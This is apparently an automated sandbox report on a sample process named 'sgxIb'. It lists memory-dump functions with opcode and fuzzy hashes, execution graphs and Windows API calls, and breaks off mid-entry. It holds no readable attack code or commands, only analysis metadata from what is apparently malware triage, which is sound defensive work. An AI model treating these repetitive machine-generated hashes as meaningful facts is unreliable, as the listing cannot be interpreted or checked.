                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: adc108c0fac19fee6e5a019e2d32e36deef034fb5c6fccba319dd876adc4f50f
                                              • Instruction ID: 4b9a9afa9e843ffa196f2566267e037b209359c5ed37621c1c95283d1ad4fb96
                                              • Opcode Fuzzy Hash: adc108c0fac19fee6e5a019e2d32e36deef034fb5c6fccba319dd876adc4f50f
                                              • Instruction Fuzzy Hash: 5201DF32F000295BDF94A668DC10AEF77FAEBC8210F014035D50AEB244EE759C074BE1
                                              Function 06BD3D99 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f925b2247bdbffbf8b725692d1ccd64c64d759750d1c165b434080f1357d0cd
                                              • Instruction ID: e76b6e5dda9ea2ee816aa7b598509f350a5f739b9500f55af01f2fcbe738c5ce
                                              • Opcode Fuzzy Hash: 0f925b2247bdbffbf8b725692d1ccd64c64d759750d1c165b434080f1357d0cd
                                              • Instruction Fuzzy Hash: 3421C0B5D01219AFCB10DF9AD984ADEFFB8FB49310F10812AE918A7241D374A954CBA5
                                              Function 06BD3DA0 Relevance: .1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7388ec9749eaf6cb4fe56c52e02ea103c9df8effd85cddc3cbaf2a2d35d3241
                                              • Instruction ID: ba966cf4871e5c99ce69245c7f8f24d944d7538b9f0eabcb8814d5823c62b6e7
                                              • Opcode Fuzzy Hash: c7388ec9749eaf6cb4fe56c52e02ea103c9df8effd85cddc3cbaf2a2d35d3241
                                              • Instruction Fuzzy Hash: 8011C2B5D01219AFCB00DF9AD884ADEFBB4FB49310F10812AE518A7241D374A954CBA5
                                              Function 06BDF2B8 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75801e4f5fa491c01f9e533720e19370bb6b8f6cff41f1210c6e24b0639b8928
                                              • Instruction ID: 11076715cbba1c2a99af53d83b35a1f6c754edaa873f04e6d8a278368354419a
                                              • Opcode Fuzzy Hash: 75801e4f5fa491c01f9e533720e19370bb6b8f6cff41f1210c6e24b0639b8928
                                              • Instruction Fuzzy Hash: E501B1B6F181500BCB66D67C945477E67DADB85618F148869E04FCF380EA95DD028382
                                              Function 06BD4328 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3093abeec23e7c52629ad51be5fb6c15e8ac9611a6e2b8e52deb0e94700a997d
                                              • Instruction ID: d37b401a0d22fac9ab86175a07cad2d48fb0a98c5c21e687e22029ee455432d2
                                              • Opcode Fuzzy Hash: 3093abeec23e7c52629ad51be5fb6c15e8ac9611a6e2b8e52deb0e94700a997d
                                              • Instruction Fuzzy Hash: 0B01D1B5B100140BDB64996DD41472FA3EBDBCA724F10843EE10ECB354ED71DC024381
                                              Function 06BDF2C8 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5a0a9e1105f50f426246a5738d4e81844f3ab2f5c6763c2f5e757937f805336
                                              • Instruction ID: 2510001ec07bc14fba6633f586e147ff955eccd96aae9c939ca8182b69036813
                                              • Opcode Fuzzy Hash: b5a0a9e1105f50f426246a5738d4e81844f3ab2f5c6763c2f5e757937f805336
                                              • Instruction Fuzzy Hash: F5018175B140150BCB65997DE45473E67DEDBC9628F208479E50FCF390EE65DD024382
                                              Function 06BDA430 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f69af5f065f7dc45574bca35c05d263b904d17112e3553b6db25f50fa87bd81
                                              • Instruction ID: 429d217041260fefcb3650eaa19f8e4e75736b2ff4d2c8f401f7527e1df516c4
                                              • Opcode Fuzzy Hash: 4f69af5f065f7dc45574bca35c05d263b904d17112e3553b6db25f50fa87bd81
                                              • Instruction Fuzzy Hash: 0101A471B000154BCB65EA7DE858B2B73DAEBCA718F108478E10ECB354EE21DC028BC1
                                              Function 06BD6588 Relevance: .0, Instructions: 27COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c74d842d1124f311312f55bb5c2ff4d068571675dfddb4ac14adc26c5ccb1128
                                              • Instruction ID: 5f9713d5c7b9a27e6e5d44d88ef040ee74a73478e16995bb5d7829fa486212b4
                                              • Opcode Fuzzy Hash: c74d842d1124f311312f55bb5c2ff4d068571675dfddb4ac14adc26c5ccb1128
                                              • Instruction Fuzzy Hash: 22E022F0D0420C6FDF20DA74890578A3BE9D702208F1040E6D804DF206F231C9818382

                                              Non-executed Functions

                                              Function 06BD77B8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-2843079600
                                              • Opcode ID: 3cd7ad0da1c6dd7d8082a227e9a8fdd59a867a98403349458e571f60a02d4d65
                                              • Instruction ID: b71632885184fdd812314886e123071023b3ca63839f0e116cd3e78d070d08b8
                                              • Opcode Fuzzy Hash: 3cd7ad0da1c6dd7d8082a227e9a8fdd59a867a98403349458e571f60a02d4d65
                                              • Instruction Fuzzy Hash: 38123D70E002198FDB68DF69C994A9DB7F6FF88304F2089A9D409AB254EF749D41CF91
                                              Function 06BDAA50 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-1273862796
                                              • Opcode ID: 52491979305d4f98981a12dc2f3ce20006ac12eb2a2d3eba6370d9038557ad6c
                                              • Instruction ID: a11b703c2d4db3117b4773ad751fb3af30bc876d54218e84061728c6e4baa2ef
                                              • Opcode Fuzzy Hash: 52491979305d4f98981a12dc2f3ce20006ac12eb2a2d3eba6370d9038557ad6c
                                              • Instruction Fuzzy Hash: 7F9192B0A00209DFDF68DF68D994B6E77F6FF44301F148569D806AB2A4EB749C45CB90
                                              Function 06BD71B8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-981061697
                                              • Opcode ID: 1f85bc777d361940e0e75b7550eec94cc3416bd6c88e42504468c20fd99d7c1d
                                              • Instruction ID: 7f89150c4d5aac25309604c88bb509c387c37324db4f8fce3c1ba25b5124b605
                                              • Opcode Fuzzy Hash: 1f85bc777d361940e0e75b7550eec94cc3416bd6c88e42504468c20fd99d7c1d
                                              • Instruction Fuzzy Hash: 82F16074B00209CFDB59EFA8D550AAEB7B7FF84300F248569D4169B368DBB49C42CB90
                                              Function 06BDBB30 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465
                                              • Opcode ID: df4f234eca30ef5f1634b9d0ce4267e129ca82a31179a29db47e8af4cd8f9913
                                              • Instruction ID: 238399404493c6080d0a2872b6060b1aeeef2fecb6809239438a601dbc8153db
                                              • Opcode Fuzzy Hash: df4f234eca30ef5f1634b9d0ce4267e129ca82a31179a29db47e8af4cd8f9913
                                              • Instruction Fuzzy Hash: 1B71AFF1A402098FDBA8DF68D450AAEB7F6FF85304B1184A9D40ADF254EB71DD45CB81
                                              Function 06BD84F0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 9f712363e54a43bf3f6526dc25bf2469633889bd279350491cd8a3e874f23c58
                                              • Instruction ID: 034cd4cb39d4d1acb457979332e3aa5fcfc9a775badc8380115185dcbe776a91
                                              • Opcode Fuzzy Hash: 9f712363e54a43bf3f6526dc25bf2469633889bd279350491cd8a3e874f23c58
                                              • Instruction Fuzzy Hash: B3B15D70F002098FDB58EFA9D590A6EB7B6FF84305F248469D406AB354EB75DC82CB81
                                              Function 06BDADD8 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 103279f62f20060a6d2b0a3f4e35fc0be5df8cc2eef311d3d147e90dbf3a3c6c
                                              • Instruction ID: 628225a4b00562125127c5920da5536a2124b296ca9d9377f4991844b77ab7d4
                                              • Opcode Fuzzy Hash: 103279f62f20060a6d2b0a3f4e35fc0be5df8cc2eef311d3d147e90dbf3a3c6c
                                              • Instruction Fuzzy Hash: B451A2B4E102089FCFA5DB68D990AADB7B6FF84300F2459A9D416EB254EB31DC41CB91
                                              Function 06BD8908 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LR]q$LR]q$$]q$$]q
                                              • API String ID: 0-3527005858
                                              • Opcode ID: d5dcc4dc7dfa9ce224b5a7db3f9de37bb37406ea9251a265a0119fe548a3fff2
                                              • Instruction ID: 3a404b4b894b544d9391b131b6bae9fb851cc1bb75db066ee6df3177c0d38853
                                              • Opcode Fuzzy Hash: d5dcc4dc7dfa9ce224b5a7db3f9de37bb37406ea9251a265a0119fe548a3fff2
                                              • Instruction Fuzzy Hash: 9F51D170B002059FDB58EF28D990A6E77E6FF84704F1495A9D4069F3A9EB74EC01CB91
                                              Function 06BDAE64 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 60d49ca3f8539189fae91b85778311dd5204b90d5f8104f6d537acd2301eb5ef
                                              • Instruction ID: 9548be705fbdf846622189ee3e0e3d76b2b38b5a724c898bfa71917f46623129
                                              • Opcode Fuzzy Hash: 60d49ca3f8539189fae91b85778311dd5204b90d5f8104f6d537acd2301eb5ef
                                              • Instruction Fuzzy Hash: 98415FB4A102058FCFA5DB64D59096DB3B6FF84300B2495A9D415EB254EB30EC41CB91

                                              Execution Graph

                                              Execution Coverage:9.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:159
                                              Total number of Limit Nodes:6
                                              execution_graph 26407 18dd01c 26408 18dd034 26407->26408 26409 18dd08e 26408->26409 26412 56d2a68 26408->26412 26418 56d2a78 26408->26418 26413 56d2aa5 26412->26413 26414 56d2ad7 26413->26414 26424 56d2bf1 26413->26424 26429 56d2ccc 26413->26429 26435 56d2c00 26413->26435 26419 56d2aa5 26418->26419 26420 56d2ad7 26419->26420 26421 56d2ccc 2 API calls 26419->26421 26422 56d2bf1 2 API calls 26419->26422 26423 56d2c00 2 API calls 26419->26423 26421->26420 26422->26420 26423->26420 26426 56d2c00 26424->26426 26425 56d2ca0 26425->26414 26440 56d2cb8 26426->26440 26443 56d2ca7 26426->26443 26430 56d2c8a 26429->26430 26431 56d2cda 26429->26431 26433 56d2cb8 2 API calls 26430->26433 26434 56d2ca7 2 API calls 26430->26434 26432 56d2ca0 26432->26414 26433->26432 26434->26432 26437 56d2c14 26435->26437 26436 56d2ca0 26436->26414 26438 56d2cb8 2 API calls 26437->26438 26439 56d2ca7 2 API calls 26437->26439 26438->26436 26439->26436 26441 56d2cc9 26440->26441 26447 56d40f2 26440->26447 26441->26425 26444 56d2cb8 26443->26444 26445 56d2cc9 26444->26445 26446 56d40f2 2 API calls 26444->26446 26445->26425 26446->26445 26451 56d4120 26447->26451 26455 56d4110 26447->26455 26448 56d410a 26448->26441 26452 56d4162 26451->26452 26454 56d4169 26451->26454 26453 56d41ba CallWindowProcW 26452->26453 26452->26454 26453->26454 26454->26448 26456 56d4162 26455->26456 26458 56d4169 26455->26458 26457 56d41ba CallWindowProcW 26456->26457 26456->26458 26457->26458 26458->26448 26274 56d7208 26275 56d7235 26274->26275 26286 56d6fb4 26275->26286 26277 56d7256 26278 56d6fb4 GetModuleHandleW 26277->26278 26279 56d7288 26278->26279 26292 56d6fc4 26279->26292 26282 56d6fc4 GetModuleHandleW 26283 56d72ec 26282->26283 26284 56d6fb4 GetModuleHandleW 26283->26284 26285 56d7350 26284->26285 26287 56d6fbf 26286->26287 26288 56d8413 26287->26288 26296 3028468 26287->26296 26303 3025d38 26287->26303 26310 3028488 26287->26310 26288->26277 26293 56d6fcf 26292->26293 26358 56d7184 26293->26358 26295 56d72ba 26295->26282 26299 302846d 26296->26299 26297 302874b 26298 3028789 26297->26298 26321 302cef0 26297->26321 26326 302cee1 26297->26326 26298->26288 26299->26297 26317 302adf0 26299->26317 26304 3025d43 26303->26304 26305 302874b 26304->26305 26309 302adf0 GetModuleHandleW 26304->26309 26306 3028789 26305->26306 26307 302cef0 GetModuleHandleW 26305->26307 26308 302cee1 GetModuleHandleW 26305->26308 26306->26288 26307->26306 26308->26306 26309->26305 26311 3028498 26310->26311 26313 302874b 26311->26313 26316 302adf0 GetModuleHandleW 26311->26316 26312 3028789 26312->26288 26313->26312 26314 302cef0 GetModuleHandleW 26313->26314 26315 302cee1 GetModuleHandleW 26313->26315 26314->26312 26315->26312 26316->26313 26331 302ae28 26317->26331 26334 302ae17 26317->26334 26318 302ae06 26318->26297 26322 302cf11 26321->26322 26323 302cf35 26322->26323 26342 302d1b0 26322->26342 26346 302d1c0 26322->26346 26323->26298 26327 302cef0 26326->26327 26328 302cf35 26327->26328 26329 302d1b0 GetModuleHandleW 26327->26329 26330 302d1c0 GetModuleHandleW 26327->26330 26328->26298 26329->26328 26330->26328 26332 302ae37 26331->26332 26337 302af11 26331->26337 26332->26318 26336 302af11 GetModuleHandleW 26334->26336 26335 302ae37 26335->26318 26336->26335 26338 302af31 26337->26338 26339 302af54 26337->26339 26338->26339 26340 302b158 GetModuleHandleW 26338->26340 26339->26332 26341 302b185 26340->26341 26341->26332 26343 302d1cd 26342->26343 26344 302d207 26343->26344 26350 302b4b8 26343->26350 26344->26323 26347 302d1cd 26346->26347 26348 302d207 26347->26348 26349 302b4b8 GetModuleHandleW 26347->26349 26348->26323 26349->26348 26351 302b4c3 26350->26351 26353 302df20 26351->26353 26354 302d90c 26351->26354 26353->26353 26355 302d917 26354->26355 26356 3025d38 GetModuleHandleW 26355->26356 26357 302df8f 26356->26357 26357->26353 26359 56d718f 26358->26359 26360 56d92b2 26359->26360 26361 3028468 GetModuleHandleW 26359->26361 26362 3028488 GetModuleHandleW 26359->26362 26363 3025d38 GetModuleHandleW 26359->26363 26360->26295 26361->26360 26362->26360 26363->26360 26364 3024668 26365 302467a 26364->26365 26366 3024686 26365->26366 26370 3024779 26365->26370 26375 3024210 26366->26375 26368 30246a5 26371 302479d 26370->26371 26379 3024888 26371->26379 26383 3024879 26371->26383 26376 302421b 26375->26376 26391 3025cb8 26376->26391 26378 3027025 26378->26368 26381 30248af 26379->26381 26380 302498c 26380->26380 26381->26380 26387 30244d4 26381->26387 26385 3024888 26383->26385 26384 302498c 26385->26384 26386 30244d4 CreateActCtxA 26385->26386 26386->26384 26388 3025918 CreateActCtxA 26387->26388 26390 30259db 26388->26390 26392 3025cc3 26391->26392 26395 3025cd8 26392->26395 26394 3027275 26394->26378 26396 3025ce3 26395->26396 26399 3025d08 26396->26399 26398 302735a 26398->26394 26400 3025d13 26399->26400 26401 3025d38 GetModuleHandleW 26400->26401 26402 302744d 26401->26402 26402->26398 26459 302d2d8 26460 302d31e 26459->26460 26464 302d4a7 26460->26464 26468 302d4b8 26460->26468 26461 302d40b 26465 302d4b8 26464->26465 26471 302b580 26465->26471 26469 302b580 DuplicateHandle 26468->26469 26470 302d4e6 26469->26470 26470->26461 26472 302d520 DuplicateHandle 26471->26472 26473 302d4e6 26472->26473 26473->26461 26403 56d9261 26404 56d9270 26403->26404 26405 56d7184 GetModuleHandleW 26404->26405 26406 56d927f 26405->26406

                                              Executed Functions

                                              Function 0302AF11 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 358 302af11-302af2f 359 302af31-302af3e call 3029e80 358->359 360 302af5b-302af5f 358->360 366 302af40 359->366 367 302af54 359->367 362 302af73-302afb4 360->362 363 302af61-302af6b 360->363 369 302afc1-302afcf 362->369 370 302afb6-302afbe 362->370 363->362 414 302af46 call 302b590 366->414 415 302af46 call 302b5b8 366->415 367->360 371 302aff3-302aff5 369->371 372 302afd1-302afd6 369->372 370->369 377 302aff8-302afff 371->377 374 302afe1 372->374 375 302afd8-302afdf call 3029e8c 372->375 373 302af4c-302af4e 373->367 376 302b090-302b150 373->376 379 302afe3-302aff1 374->379 375->379 409 302b152-302b155 376->409 410 302b158-302b183 GetModuleHandleW 376->410 380 302b001-302b009 377->380 381 302b00c-302b013 377->381 379->377 380->381 382 302b020-302b029 call 3029e9c 381->382 383 302b015-302b01d 381->383 389 302b036-302b03b 382->389 390 302b02b-302b033 382->390 383->382 391 302b059-302b066 389->391 392 302b03d-302b044 389->392 390->389 399 302b068-302b086 391->399 400 302b089-302b08f 391->400 392->391 394 302b046-302b056 call 3029eac call 3029ebc 392->394 394->391 399->400 409->410 411 302b185-302b18b 410->411 412 302b18c-302b1a0 410->412 411->412 414->373 415->373
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0302B176
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: cd0125f703d80c3d7789e746ac8d99b7880ef39917efe390c74ecc446f4ae916
                                              • Instruction ID: 0e7ead4e164035abd9ed4cb0637eaf72b14aeeeec3929e0cc81ecd14a347e57a
                                              • Opcode Fuzzy Hash: cd0125f703d80c3d7789e746ac8d99b7880ef39917efe390c74ecc446f4ae916
                                              • Instruction Fuzzy Hash: 4E8187B0A01B158FDB64DF69D08075ABBF1FF88300F048A6DD05ADBA50DB39E809CB90
                                              Function 030244D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 416 30244d4-30259d9 CreateActCtxA 419 30259e2-3025a3c 416->419 420 30259db-30259e1 416->420 427 3025a4b-3025a4f 419->427 428 3025a3e-3025a41 419->428 420->419 429 3025a60 427->429 430 3025a51-3025a5d 427->430 428->427 432 3025a61 429->432 430->429 432->432
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 030259C9
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 205ab72fbb76c028d7dfd4ce5ff1e68c316465bce352f54f535ee107511603d6
                                              • Instruction ID: ca070b1ea2c125465a277bcd330a84d7ebdde454c676f8cb4a6edd48c2d92aa3
                                              • Opcode Fuzzy Hash: 205ab72fbb76c028d7dfd4ce5ff1e68c316465bce352f54f535ee107511603d6
                                              • Instruction Fuzzy Hash: 1541F1B0C01719CBDB24CFA9C885B9DFBF5BF49314F64806AD408AB251DB756945CF90
                                              Function 0302590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 433 302590c-30259d9 CreateActCtxA 435 30259e2-3025a3c 433->435 436 30259db-30259e1 433->436 443 3025a4b-3025a4f 435->443 444 3025a3e-3025a41 435->444 436->435 445 3025a60 443->445 446 3025a51-3025a5d 443->446 444->443 448 3025a61 445->448 446->445 448->448
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 030259C9
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 498ca542bb3b588556669007b3f7bb4aff2f1cc0dc19fc46107d50aeca90c5a8
                                              • Instruction ID: 8c06df69f5cf8698d66a49846d0c328e0f9d5a65297c526d503dcc5e355212ca
                                              • Opcode Fuzzy Hash: 498ca542bb3b588556669007b3f7bb4aff2f1cc0dc19fc46107d50aeca90c5a8
                                              • Instruction Fuzzy Hash: 2941FFB0C01729CADB24CFA9C885B9DFBF1BF49304F24806AD408AB255DB755946CF90
                                              Function 056D4120 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 449 56d4120-56d415c 450 56d420c-56d422c 449->450 451 56d4162-56d4167 449->451 457 56d422f-56d423c 450->457 452 56d4169-56d41a0 451->452 453 56d41ba-56d41f2 CallWindowProcW 451->453 460 56d41a9-56d41b8 452->460 461 56d41a2-56d41a8 452->461 454 56d41fb-56d420a 453->454 455 56d41f4-56d41fa 453->455 454->457 455->454 460->457 461->460
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 056D41E1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2267447094.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_56d0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: ecd1eaee089639b4b13fa7ab1d2e4f0794046a174337c7dd23111cf9ae1f47d4
                                              • Instruction ID: 94db51273f15fb4d7a0d61c479bd167630501091a758d603a69d332d8d2c475c
                                              • Opcode Fuzzy Hash: ecd1eaee089639b4b13fa7ab1d2e4f0794046a174337c7dd23111cf9ae1f47d4
                                              • Instruction Fuzzy Hash: 73411AB5900309CFDB14CF99C888AAAFBF5FF98314F248859D519AB321D775A841CFA0
                                              Function 0302B580 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 463 302b580-302d5b4 DuplicateHandle 465 302d5b6-302d5bc 463->465 466 302d5bd-302d5da 463->466 465->466
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0302D4E6,?,?,?,?,?), ref: 0302D5A7
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 0ee6de388ef7226967a9d70e1d1a5f754009922010014981b67d5f31d85b593a
                                              • Instruction ID: a1391a3354a3504a6a0907eb2cdff029c412429cc2cb30239522a73feffac5bb
                                              • Opcode Fuzzy Hash: 0ee6de388ef7226967a9d70e1d1a5f754009922010014981b67d5f31d85b593a
                                              • Instruction Fuzzy Hash: 6B2116B59012589FDB10CF9AD484ADEFFF4FB48310F14841AE914A7310D378A944CFA4
                                              Function 0302D518 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 469 302d518-302d51a 470 302d520-302d5b4 DuplicateHandle 469->470 471 302d5b6-302d5bc 470->471 472 302d5bd-302d5da 470->472 471->472
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0302D4E6,?,?,?,?,?), ref: 0302D5A7
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: a418af8df8fed80533539ed8f4d5aa832fd64be8ee60b3f032f04d00015a78d0
                                              • Instruction ID: 057f05696e993c1350f7585bdf507d67aa1743d6c5130ea96569c6e8d5eeec14
                                              • Opcode Fuzzy Hash: a418af8df8fed80533539ed8f4d5aa832fd64be8ee60b3f032f04d00015a78d0
